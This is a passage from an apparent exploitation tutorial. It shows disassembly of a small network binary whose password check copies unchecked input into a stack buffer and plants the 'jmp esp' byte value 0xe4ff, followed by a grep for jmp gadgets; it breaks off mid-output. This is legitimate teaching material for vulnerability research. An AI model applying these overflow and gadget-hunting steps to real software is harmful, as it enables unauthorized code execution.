8048660 lt;recvfrom@pltgt;/span/span span class="code-line"span class="x" 80489c1: 89 84 24 30 04 00 00 mov DWORD PTR [esp+0x430],eax/span/span span class="code-line"span class="x" 80489c8: 8d 54 24 24 lea edx,[esp+0x24]/span/span span class="code-line"span class="x" 80489cc: 8b 84 24 30 04 00 00 mov eax,DWORD PTR [esp+0x430]/span/span span class="code-line"span class="x" 80489d3: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80489d5: c6 00 00 mov BYTE PTR [eax],0x0/span/span span class="code-line"span class="x" 80489d8: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489dc: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489df: e8 a8 02 00 00 call 8048c8c lt;checkpassgt;/span/span span class="code-line"span class="x" 80489e4: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 80489eb: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 80489f2: 00 /span/span span class="code-line"span class="x" 80489f3: 0f 84 8c 00 00 00 je 8048a85 lt;main+0x219gt;/span/span span class="code-line"span class="x" 80489f9: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x5/span/span span class="code-line"span class="x" 8048a00: 05 /span/span span class="code-line"span class="x" 8048a01: 74 45 je 8048a48 lt;main+0x1dcgt;/span/span span class="code-line"span class="x" 8048a03: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048a07: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 8048a0b: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a12: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a16: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a1d: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a21: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a28: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a2c: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a33: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a37: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a3e: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a41: e8 41 01 00 00 call 8048b87 lt;senderrorgt;/span/span span class="code-line"span class="x" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a48: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a4f: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a53: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a5a: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a5e: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a65: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a69: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a70: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a74: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a7b: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a7e: e8 76 01 00 00 call 8048bf9 lt;sendtokengt;/span/span span class="code-line"span class="x" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a85: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a8c: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a90: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a97: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a9b: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048aa2: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048aa6: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048aad: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048ab1: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ab8: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048abb: e8 34 00 00 00 call 8048af4 lt;sendfilegt;/span/span span class="code-line"span class="x" 8048ac0: c7 04 24 b2 8d 04 08 mov DWORD PTR [esp],0x8048db2/span/span span class="code-line"span class="x" 8048ac7: e8 d4 fb ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048acc: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048ad0: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048ad4: c7 04 24 ca 8d 04 08 mov DWORD PTR [esp],0x8048dca/span/span span class="code-line"span class="x" 8048adb: e8 50 fb ff ff call 8048630 lt;printf@pltgt;/span/span span class="code-line"span class="x" 8048ae0: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ae7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048aea: e8 81 fc ff ff call 8048770 lt;close@pltgt;/span/span span class="code-line"span class="x" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048af4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendfile/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048af4: 55 push ebp/span/span span class="code-line"span class="x" 8048af5: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048af7: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048afa: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048b01: 08 /span/span span class="code-line"span class="x" 8048b02: c7 04 24 cf 8d 04 08 mov DWORD PTR [esp],0x8048dcf/span/span span class="code-line"span class="x" 8048b09: e8 f2 fb ff ff call 8048700 lt;fopen@pltgt;/span/span span class="code-line"span class="x" 8048b0e: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048b11: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048b15: 74 56 je 8048b6d lt;sendfile+0x79gt;/span/span span class="code-line"span class="x" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="x" 8048b19: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b20: 00 /span/span span class="code-line"span class="x" 8048b21: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b24: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b28: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048b2f: 00 /span/span span class="code-line"span class="x" 8048b30: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048b37: 00 /span/span span class="code-line"span class="x" 8048b38: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048b3b: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048b3f: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048b42: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b45: e8 d6 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048b4a: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b4d: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b50: e8 1b fb ff ff call 8048670 lt;_IO_getc@pltgt;/span/span span class="code-line"span class="x" 8048b55: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048b58: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048b5b: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048b5e: 75 b9 jne 8048b19 lt;sendfile+0x25gt;/span/span span class="code-line"span class="x" 8048b60: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b63: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b66: e8 e5 fa ff ff call 8048650 lt;fclose@pltgt;/span/span span class="code-line"span class="x" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="x" 8048b6d: c7 04 24 dc 8d 04 08 mov DWORD PTR [esp],0x8048ddc/span/span span class="code-line"span class="x" 8048b74: e8 27 fb ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048b79: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048b80: e8 3b fb ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048b85: c9 leave /span/span span class="code-line"span class="x" 8048b86: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048b87/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"senderror/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048b87: 55 push ebp/span/span span class="code-line"span class="x" 8048b88: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048b8a: 83 ec 28 sub esp,0x28/span/span span class="code-line"span class="x" 8048b8d: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b94: 00 /span/span span class="code-line"span class="x" 8048b95: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b98: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b9c: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048ba3: 00 /span/span span class="code-line"span class="x" 8048ba4: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 8048bab: 00 /span/span span class="code-line"span class="x" 8048bac: c7 44 24 04 fb 8d 04 mov DWORD PTR [esp+0x4],0x8048dfb/span/span span class="code-line"span class="x" 8048bb3: 08 /span/span span class="code-line"span class="x" 8048bb4: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bb7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bba: e8 61 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048bbf: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048bc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bc5: e8 06 fb ff ff call 80486d0 lt;strlen@pltgt;/span/span span class="code-line"span class="x" 8048bca: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048bd1: 00 /span/span span class="code-line"span class="x" 8048bd2: 8d 55 0c lea edx,[ebp+0xc]/span/span span class="code-line"span class="x" 8048bd5: 89 54 24 10 mov DWORD PTR [esp+0x10],edx/span/span span class="code-line"span class="x" 8048bd9: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048be0: 00 /span/span span class="code-line"span class="x" 8048be1: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048be5: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048be8: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048bec: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bef: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bf2: e8 29 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048bf7: c9 leave /span/span span class="code-line"span class="x" 8048bf8: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048bf9/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendtoken/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048bf9: 55 push ebp/span/span span class="code-line"span class="x" 8048bfa: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048bfc: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048bff: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048c06: 08 /span/span span class="code-line"span class="x" 8048c07: c7 04 24 0c 8e 04 08 mov DWORD PTR [esp],0x8048e0c/span/span span class="code-line"span class="x" 8048c0e: e8 ed fa ff ff call 8048700 lt;fopen@pltgt;/span/span span class="code-line"span class="x" 8048c13: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048c16: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048c1a: 74 56 je 8048c72 lt;sendtoken+0x79gt;/span/span span class="code-line"span class="x" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="x" 8048c1e: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048c25: 00 /span/span span class="code-line"span class="x" 8048c26: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048c29: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048c2d: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048c34: 00 /span/span span class="code-line"span class="x" 8048c35: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048c3c: 00 /span/span span class="code-line"span class="x" 8048c3d: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048c40: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048c44: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c47: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c4a: e8 d1 fa ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048c4f: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c52: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c55: e8 16 fa ff ff call 8048670 lt;_IO_getc@pltgt;/span/span span class="code-line"span class="x" 8048c5a: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048c5d: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048c60: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048c63: 75 b9 jne 8048c1e lt;sendtoken+0x25gt;/span/span span class="code-line"span class="x" 8048c65: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c68: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c6b: e8 e0 f9 ff ff call 8048650 lt;fclose@pltgt;/span/span span class="code-line"span class="x" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="x" 8048c72: c7 04 24 12 8e 04 08 mov DWORD PTR [esp],0x8048e12/span/span span class="code-line"span class="x" 8048c79: e8 22 fa ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048c7e: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048c85: e8 36 fa ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048c8a: c9 leave /span/span span class="code-line"span class="x" 8048c8b: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048c8c/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"checkpass/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048c8c: 55 push ebp/span/span span class="code-line"span class="x" 8048c8d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048c8f: 81 ec 28 02 00 00 sub esp,0x228/span/span span class="code-line"span class="x" 8048c95: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c98: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c9b: e8 30 fa ff ff call 80486d0 lt;strlen@pltgt;/span/span span class="code-line"span class="x" 8048ca0: 83 c0 01 add eax,0x1/span/span span class="code-line"span class="x" 8048ca3: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048ca7: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048caa: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048cae: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cb4: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cb7: e8 54 fa ff ff call 8048710 lt;strncpy@pltgt;/span/span span class="code-line"span class="x" 8048cbc: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cc5: e8 86 fa ff ff call 8048750 lt;atoi@pltgt;/span/span span class="code-line"span class="x" 8048cca: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"span class="x" 8048cd4: 75 09 jne 8048cdf lt;checkpass+0x53gt;/span/span span class="code-line"span class="x" 8048cd6: c7 45 f4 05 00 00 00 mov DWORD PTR [ebp-0xc],0x5/span/span span class="code-line"span class="x" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"span class="x" 8048cdf: c7 44 24 04 2c 8e 04 mov DWORD PTR [esp+0x4],0x8048e2c/span/span span class="code-line"span class="x" 8048ce6: 08 /span/span span class="code-line"span class="x" 8048ce7: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048ced: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cf0: e8 2b f9 ff ff call 8048620 lt;strcmp@pltgt;/span/span span class="code-line"span class="x" 8048cf5: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048cf8: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048cfb: c9 leave /span/span span class="code-line"span class="x" 8048cfc: c3 ret /span/span span class="code-line"span class="x" 8048cfd: 90 nop/span/span span class="code-line"span class="x" 8048cfe: 90 nop/span/span span class="code-line"span class="x" 8048cff: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"08048d00/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d00: 55 push ebp/span/span span class="code-line"span class="x" 8048d01: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d03: 5d pop ebp/span/span span class="code-line"span class="x" 8048d04: c3 ret /span/span span class="code-line"span class="x" 8048d05: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"span class="x" 8048d09: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048d10/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d10: 55 push ebp/span/span span class="code-line"span class="x" 8048d11: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d13: 57 push edi/span/span span class="code-line"span class="x" 8048d14: 56 push esi/span/span span class="code-line"span class="x" 8048d15: 53 push ebx/span/span span class="code-line"span class="x" 8048d16: e8 4f 00 00 00 call 8048d6a lt;__i686.get_pc_thunk.bxgt;/span/span span class="code-line"span class="x" 8048d1b: 81 c3 e5 03 00 00 add ebx,0x3e5/span/span span class="code-line"span class="x" 8048d21: 83 ec 1c sub esp,0x1c/span/span span class="code-line"span class="x" 8048d24: e8 b7 f8 ff ff call 80485e0 lt;_initgt;/span/span span class="code-line"span class="x" 8048d29: 8d bb 04 ff ff ff lea edi,[ebx-0xfc]/span/span span class="code-line"span class="x" 8048d2f: 8d 83 00 ff ff ff lea eax,[ebx-0x100]/span/span span class="code-line"span class="x" 8048d35: 29 c7 sub edi,eax/span/span span class="code-line"span class="x" 8048d37: c1 ff 02 sar edi,0x2/span/span span class="code-line"span class="x" 8048d3a: 85 ff test edi,edi/span/span span class="code-line"span class="x" 8048d3c: 74 24 je 8048d62 lt;__libc_csu_init+0x52gt;/span/span span class="code-line"span class="x" 8048d3e: 31 f6 xor esi,esi/span/span span class="code-line"span class="x" 8048d40: 8b 45 10 mov eax,DWORD PTR [ebp+0x10]/span/span span class="code-line"span class="x" 8048d43: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048d47: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 8048d4a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048d4e: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048d51: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048d54: ff 94 b3 00 ff ff ff call DWORD PTR [ebx+esi*4-0x100]/span/span span class="code-line"span class="x" 8048d5b: 83 c6 01 add esi,0x1/span/span span class="code-line"span class="x" 8048d5e: 39 fe cmp esi,edi/span/span span class="code-line"span class="x" 8048d60: 72 de jb 8048d40 lt;__libc_csu_init+0x30gt;/span/span span class="code-line"span class="x" 8048d62: 83 c4 1c add esp,0x1c/span/span span class="code-line"span class="x" 8048d65: 5b pop ebx/span/span span class="code-line"span class="x" 8048d66: 5e pop esi/span/span span class="code-line"span class="x" 8048d67: 5f pop edi/span/span span class="code-line"span class="x" 8048d68: 5d pop ebp/span/span span class="code-line"span class="x" 8048d69: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048d6a/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d6a: 8b 1c 24 mov ebx,DWORD PTR [esp]/span/span span class="code-line"span class="x" 8048d6d: c3 ret /span/span span class="code-line"span class="x" 8048d6e: 90 nop/span/span span class="code-line"span class="x" 8048d6f: 90 nop/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048d70/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d70: 55 push ebp/span/span span class="code-line"span class="x" 8048d71: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d73: 53 push ebx/span/span span class="code-line"span class="x" 8048d74: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 8048d77: e8 00 00 00 00 call 8048d7c lt;_fini+0xcgt;/span/span span class="code-line"span class="x" 8048d7c: 5b pop ebx/span/span span class="code-line"span class="x" 8048d7d: 81 c3 84 03 00 00 add ebx,0x384/span/span span class="code-line"span class="x" 8048d83: 59 pop ecx/span/span span class="code-line"span class="x" 8048d84: 5b pop ebx/span/span span class="code-line"span class="x" 8048d85: c9 leave /span/span span class="code-line"span class="x" 8048d86: c3 ret/span/span span class="code-line"/code/pre/div /td/tr/table pThere aren't any codejmp esp/code's there, you can use grep to make it a little easier to go through:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep jmp/span span class="code-line"span class="go" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="go" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="go" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="go" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="go" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="go" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="go" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="go" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="go" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="go" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="go" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="go" 80486bb: 